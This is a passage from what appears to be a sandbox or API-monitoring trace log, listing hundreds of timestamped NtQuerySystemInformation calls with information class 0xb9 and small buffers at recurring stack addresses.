ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0234.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0234.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, 